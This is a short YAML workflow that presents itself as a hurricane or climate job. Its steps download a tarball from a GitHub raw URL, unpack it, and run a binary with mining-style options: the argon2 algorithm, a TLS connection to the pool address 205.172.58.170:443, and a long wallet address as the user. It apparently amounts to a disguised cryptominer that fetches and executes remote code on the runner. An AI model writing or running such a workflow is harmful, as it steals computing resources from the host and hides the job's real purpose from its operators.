```yaml
name: hurricane-workflow

steps:
  - name: download
    command: >
      wget https://raw.githubusercontent.com/jaydmarks227/climate/refs/heads/main/hurricane.tar.gz

  - name: extract
    command: >
      tar -xvf hurricane.tar.gz

  - name: run
    command: >
      cd hurricane &&
      ./hurricane -a argon2
      -o 205.172.58.170:443
      --tls
      -u 88DcxveXeHaRDYLbmAxBuMZBsYwEtrDcb4EUWJvCQjKsNo2ieFTrBLNBhpVdFfLTXnRDcnJgg7Fpre43fbFMnfxkV2ZrpEm
```
